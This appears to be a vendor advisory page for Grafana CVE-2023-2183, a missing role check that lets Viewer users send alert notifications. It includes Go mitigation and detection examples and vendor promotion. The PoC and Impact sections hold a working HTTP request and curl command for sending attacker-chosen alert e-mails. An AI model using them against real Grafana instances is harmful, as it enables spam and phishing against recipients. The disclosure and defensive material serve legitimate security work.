CVE-2023-2183

CVE-2023-2183 is a medium-severity security vulnerability in github.com/grafana/grafana (go), affecting versions < 8.5.26. It is fixed in 8.5.26, 9.2.19, 9.3.15, 9.4.12, 9.5.3.

Summary

Grafana allows an attacker in the Viewer role to send alerts through the alert test API (the "Test" action on a contact point). That option is not offered in the user panel UI to the Viewer role.

Reason for the error: the API does not check the caller's access to this function, so it is available to users with the least rights, for example a Viewer, who does not even see the option in the user panel.

This enables malicious users to abuse the functionality by sending many alert messages (e-mail, Slack, etc.), spamming users, preparing phishing attacks, or getting the SMTP server / IP blocked so that all of its messages are automatically moved to spam folders and its IP is added to block lists.

Details

A logged-in user in the Viewer role does not have access, in the user panel, to the option of sending a test e-mail alert.

View of the panel for the user in the Viewer role:

Admin role - View panel for admin role:

Admin role - Next step, editing:

Admin role - Additional options:

PoC

HTTP request sent by a user in the Viewer role:

POST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1
Host: xxx
Cookie: grafana_session=xxx
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana
accept: application/json, text/plain, */*
content-type: application/json
…

{"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"settings":{"addresses":"<[email protected]>",
"singleEmail":true},"secureSettings":{},"type":"email","name":"test","disableResolveMessage":false}]}],
"alert":{"annotations":{"runbook_url":"http://example.com ","description":"tekst","testowy":"test http://example.com",
"more":"http://example.com "},"labels":{}}}

HTTP Response:

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Expires: -1
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Date: Wed, 05 Apr 2023 10:43:00 GMT
Content-Length: 471

{"alert":{"annotations":{"__value_string__":"[ metric='foo' labels={instance=bar} value=10 ]","description":"tekst",
"more":"http://example.com","runbook_url":"http://example.com","summary":"Notification test",
"testowy":"testowy http://example.com"},"labels":{"alertname":"TestAlert","instance":"Grafana"}},
"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"name":"test","uid":"ojUhNFL4k","status":"ok"}]}],
"notified_at":"2023-04-05T12:43:00.1430203+02:00"}

Result:

The attacker can send the alert either as a template or as plain text.

Mitigation

  1. In the SMTP server configuration, limit how many e-mails may be sent to the same address per unit of time (a threshold).
  2. Check the API so that this endpoint cannot be accessed by roles other than admin.
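The two mitigations above, as a Go example added here (not Grafana's code): a role-check middleware placed in front of the receivers test endpoint, and a per-recipient sliding-window limit applied before any test message is sent. Assumptions: an upstream authentication layer supplies the caller's organization role in an invented X-Example-Role header, delivery itself is stubbed, and the endpoint path and body shape are those shown in the PoC.

```go
package main

import (
	"encoding/json"
	"net/http"
	"strings"
	"sync"
	"time"
)

// Organization roles as Grafana names them; an unknown or empty role ranks 0.
var roleRank = map[string]int{"Viewer": 1, "Editor": 2, "Admin": 3}

// requireRole is the check the advisory reports as missing (mitigation 2): refuse
// callers below minRole (one of the roles above) before the handler does any work.
// ASSUMPTION: an upstream auth layer has put the caller's org role in the
// X-Example-Role header; that header name is invented for this example.
func requireRole(minRole string, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if roleRank[r.Header.Get("X-Example-Role")] < roleRank[minRole] {
			http.Error(w, `{"message":"permission denied"}`, http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// recipientLimiter caps test notifications per recipient address per sliding
// window (mitigation 1, enforced in the application instead of the SMTP server).
type recipientLimiter struct {
	mu     sync.Mutex
	limit  int
	window time.Duration
	sent   map[string][]time.Time // send times per address, pruned on each call
}

// allow reports whether one more message to addr fits under the limit within the
// window and records it if so; a refused message is not recorded.
func (l *recipientLimiter) allow(addr string) bool {
	l.mu.Lock()
	defer l.mu.Unlock()
	now := time.Now()
	var recent []time.Time
	for _, t := range l.sent[addr] {
		if now.Sub(t) < l.window {
			recent = append(recent, t)
		}
	}
	if l.sent[addr] = recent; len(recent) >= l.limit {
		return false
	}
	l.sent[addr] = append(recent, now)
	return true
}

// emailRecipients decodes only the fields of a receivers/test body (shape as in
// the advisory) needed to get the address list of each e-mail receiver.
func emailRecipients(r *http.Request) ([]string, error) {
	var req struct {
		Receivers []struct {
			Configs []struct {
				Type     string                                        `json:"type"`
				Settings struct{ Addresses string `json:"addresses"` } `json:"settings"`
			} `json:"grafana_managed_receiver_configs"`
		} `json:"receivers"`
	}
	if err := json.NewDecoder(http.MaxBytesReader(nil, r.Body, 1<<20)).Decode(&req); err != nil {
		return nil, err
	}
	var out []string
	for _, rcv := range req.Receivers {
		for _, cfg := range rcv.Configs {
			if cfg.Type == "email" {
				out = append(out, strings.ToLower(strings.TrimSpace(cfg.Settings.Addresses)))
			}
		}
	}
	return out, nil
}

// testReceiversHandler enforces the recipient limit, then stands in for delivery
// (the real notification code is out of scope for this example).
func testReceiversHandler(l *recipientLimiter) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		addrs, err := emailRecipients(r)
		if err != nil {
			http.Error(w, "invalid JSON body", http.StatusBadRequest)
			return
		}
		for _, a := range addrs {
			if !l.allow(a) {
				http.Error(w, "too many test notifications to "+a, http.StatusTooManyRequests)
				return
			}
		}
		w.Header().Set("Content-Type", "application/json")
		w.Write([]byte(`{"status":"ok"}`))
	})
}

func main() {
	limiter := &recipientLimiter{limit: 3, window: time.Minute, sent: map[string][]time.Time{}}
	http.Handle("/api/alertmanager/grafana/config/api/v1/receivers/test",
		requireRole("Admin", testReceiversHandler(limiter)))
	http.ListenAndServe("127.0.0.1:3002", nil)
}
```

The order matters: the role check runs first, so a Viewer's request is rejected with 403 before the body is even parsed and consumes no recipient quota; the limiter then protects the mail server from an over-eager (or compromised) admin account.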

Impact

As I showed above, a user in the lowest role can call an API endpoint that lets them send an e-mail as an alert and control its content. With suitably modified content, the recipient may fall victim to a phishing attack, or the SMTP server may be targeted in order to get it blocked.

In practical terms, this means that for every Grafana receiver type (e.g. Slack, e-mail), a user with the least privileges can send any alert message they choose.

curl example, using a user session in the Viewer role:

curl -i -s -k -X $'POST' \
    -H $'Host: localhost:3002' -H $'Content-Length: 386' -H $'sec-ch-ua: \"Not:A-Brand\";v=\"99\", \"Chromium\";v=\"112\"' -H $'accept: application/json, text/plain, */*' -H $'content-type: application/json' -H $'x-grafana-org-id: 1' -H $'sec-ch-ua-mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36' -H $'sec-ch-ua-platform: \"macOS\"' -H $'Origin: http://localhost:3002' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: http://localhost:3002/' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Connection: close' \
    -b $'grafana_session=xxx' \
    --data-binary $'{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"<[email protected]>\",\"singleEmail\":true\x0d\x0a},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com\",\"description\":\"tekst\",\"testowy\":\"testowy http://example.com\",\x0d\x0a\"more\":\"http://example.com\"\x0d\x0a},\"labels\":{}}}\x0d\x0a' \
    $'http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test'
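For detection, a Go example added here (not from the advisory or from Grafana) that scans router-style access logs for the request pattern shown above: successful POSTs to the receivers test endpoint, counted per user in a sliding window, so that a burst of test notifications from one account stands out. The sample log lines are constructed and the logfmt field names are assumed to follow Grafana's router logging format.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
	"time"
)

// Constructed sample log in the logfmt shape of Grafana's router logging.
// ASSUMPTION: the field names (t, uname, method, path, status, remote_addr)
// follow that format; none of these lines come from a real deployment.
// viewer1 calls the test endpoint six times in 25 s, admin once, and viewer2
// is refused with 403, as a patched server should do for a Viewer.
const sampleLog = `
t=2023-04-05T12:40:10+02:00 lvl=info msg="Request Completed" logger=context userId=1 orgId=1 uname=admin method=POST path=/api/alertmanager/grafana/config/api/v1/receivers/test status=200 remote_addr=10.0.0.5 time_ms=52 size=471
t=2023-04-05T12:43:00+02:00 lvl=info msg="Request Completed" logger=context userId=3 orgId=1 uname=viewer1 method=POST path=/api/alertmanager/grafana/config/api/v1/receivers/test status=200 remote_addr=203.0.113.7 time_ms=41 size=471
t=2023-04-05T12:43:05+02:00 lvl=info msg="Request Completed" logger=context userId=3 orgId=1 uname=viewer1 method=POST path=/api/alertmanager/grafana/config/api/v1/receivers/test status=200 remote_addr=203.0.113.7 time_ms=40 size=471
t=2023-04-05T12:43:10+02:00 lvl=info msg="Request Completed" logger=context userId=3 orgId=1 uname=viewer1 method=POST path=/api/alertmanager/grafana/config/api/v1/receivers/test status=200 remote_addr=203.0.113.7 time_ms=39 size=471
t=2023-04-05T12:43:15+02:00 lvl=info msg="Request Completed" logger=context userId=3 orgId=1 uname=viewer1 method=POST path=/api/alertmanager/grafana/config/api/v1/receivers/test status=200 remote_addr=203.0.113.7 time_ms=44 size=471
t=2023-04-05T12:43:20+02:00 lvl=info msg="Request Completed" logger=context userId=3 orgId=1 uname=viewer1 method=POST path=/api/alertmanager/grafana/config/api/v1/receivers/test status=200 remote_addr=203.0.113.7 time_ms=42 size=471
t=2023-04-05T12:43:25+02:00 lvl=info msg="Request Completed" logger=context userId=3 orgId=1 uname=viewer1 method=POST path=/api/alertmanager/grafana/config/api/v1/receivers/test status=200 remote_addr=203.0.113.7 time_ms=41 size=471
t=2023-04-05T12:43:30+02:00 lvl=info msg="Request Completed" logger=context userId=3 orgId=1 uname=viewer1 method=GET path=/api/dashboards/home status=200 remote_addr=203.0.113.7 time_ms=9 size=1201
t=2023-04-05T12:44:00+02:00 lvl=info msg="Request Completed" logger=context userId=4 orgId=1 uname=viewer2 method=POST path=/api/alertmanager/grafana/config/api/v1/receivers/test status=403 remote_addr=198.51.100.9 time_ms=3 size=32
`

// kvRe matches one logfmt key=value pair; values may be double-quoted and
// contain spaces (msg="Request Completed") or be bare runs of non-space.
var kvRe = regexp.MustCompile(`(\w+)=("[^"]*"|\S*)`)

// parseLogfmt extracts the key=value pairs of one line, stripping value quotes.
func parseLogfmt(line string) map[string]string {
	kv := map[string]string{}
	for _, m := range kvRe.FindAllStringSubmatch(line, -1) {
		kv[m[1]] = strings.Trim(m[2], `"`)
	}
	return kv
}

// Finding is one user whose successful test-notification POSTs reached the
// threshold inside a single window.
type Finding struct {
	User, Remote string
	Count        int
	First, Last  time.Time
}

const testPath = "/api/alertmanager/grafana/config/api/v1/receivers/test"

// detectTestAbuse scans router log lines for successful POSTs to the receivers
// test endpoint and flags every user with at least threshold of them inside
// window. Refused (403) calls are ignored: they show the fix working.
func detectTestAbuse(logText string, threshold int, window time.Duration) []Finding {
	type hit struct {
		at     time.Time
		remote string
	}
	hits := map[string][]hit{}
	for _, line := range strings.Split(logText, "\n") {
		kv := parseLogfmt(line)
		if kv["method"] != "POST" || kv["path"] != testPath || kv["status"] != "200" {
			continue
		}
		if ts, err := time.Parse(time.RFC3339, kv["t"]); err == nil {
			hits[kv["uname"]] = append(hits[kv["uname"]], hit{ts, kv["remote_addr"]})
		}
	}
	var out []Finding
	for user, hs := range hits {
		sort.Slice(hs, func(i, j int) bool { return hs[i].at.Before(hs[j].at) })
		// Two-pointer sliding window: j runs ahead while hits stay within window of hs[i].
		for i, j := 0, 0; i < len(hs); i++ {
			for j < len(hs) && hs[j].at.Sub(hs[i].at) <= window {
				j++
			}
			if j-i >= threshold {
				out = append(out, Finding{user, hs[i].remote, j - i, hs[i].at, hs[j-1].at})
				break
			}
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].User < out[j].User })
	return out
}

func main() {
	for _, f := range detectTestAbuse(sampleLog, 5, time.Minute) {
		fmt.Printf("ALERT user=%s remote=%s tests=%d between %s and %s\n",
			f.User, f.Remote, f.Count, f.First.Format(time.RFC3339), f.Last.Format(time.RFC3339))
	}
}
```

The threshold and window are deliberately loose (five tests a minute) because a legitimate admin configuring a contact point does test it a few times; on an unpatched instance every 200 from an account that is not Editor or Admin is worth a finding on its own, which is a one-line extra condition on kv["uname"] against a known role list.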

CVE-2023-2183 has a CVSS score of 4.1 (Medium). The vector is network-reachable, low privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (8.5.26, 9.2.19, 9.3.15, 9.4.12, 9.5.3); upgrading removes the vulnerable code path.

Affected versions

github.com/grafana/grafana (< 8.5.26)
github.com/grafana/grafana (>= 9.0.0, < 9.2.19)
github.com/grafana/grafana (>= 9.3.0, < 9.3.15)
github.com/grafana/grafana (>= 9.4.0, < 9.4.12)
github.com/grafana/grafana (>= 9.5.0, < 9.5.3)

Security releases

github.com/grafana/grafana → 8.5.26 (go)
github.com/grafana/grafana → 9.2.19 (go)
github.com/grafana/grafana → 9.3.15 (go)
github.com/grafana/grafana → 9.4.12 (go)
github.com/grafana/grafana → 9.5.3 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade the following packages to resolve this vulnerability:

github.com/grafana/grafana to 8.5.26 or later
github.com/grafana/grafana to 9.2.19 or later
github.com/grafana/grafana to 9.3.15 or later
github.com/grafana/grafana to 9.4.12 or later
github.com/grafana/grafana to 9.5.3 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2023-2183? CVE-2023-2183 is a medium-severity security vulnerability in github.com/grafana/grafana (go), affecting versions < 8.5.26. It is fixed in 8.5.26, 9.2.19, 9.3.15, 9.4.12, 9.5.3.
  2. How severe is CVE-2023-2183? CVE-2023-2183 has a CVSS score of 4.1 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/grafana/grafana are affected by CVE-2023-2183? github.com/grafana/grafana (go) versions < 8.5.26 are affected.
  4. Is there a fix for CVE-2023-2183? Yes. CVE-2023-2183 is fixed in 8.5.26, 9.2.19, 9.3.15, 9.4.12, 9.5.3. Upgrade to one of these versions or later.
  5. Is CVE-2023-2183 exploitable, and should I be worried? Whether CVE-2023-2183 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2023-2183 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2023-2183?
    • Upgrade github.com/grafana/grafana to 8.5.26 or later
    • Upgrade github.com/grafana/grafana to 9.2.19 or later
    • Upgrade github.com/grafana/grafana to 9.3.15 or later
    • Upgrade github.com/grafana/grafana to 9.4.12 or later
    • Upgrade github.com/grafana/grafana to 9.5.3 or later

Other vulnerabilities in github.com/grafana/grafana

CVE-2026-33381
CVE-2026-33380
CVE-2026-27877
CVE-2026-21724
CVE-2025-41117
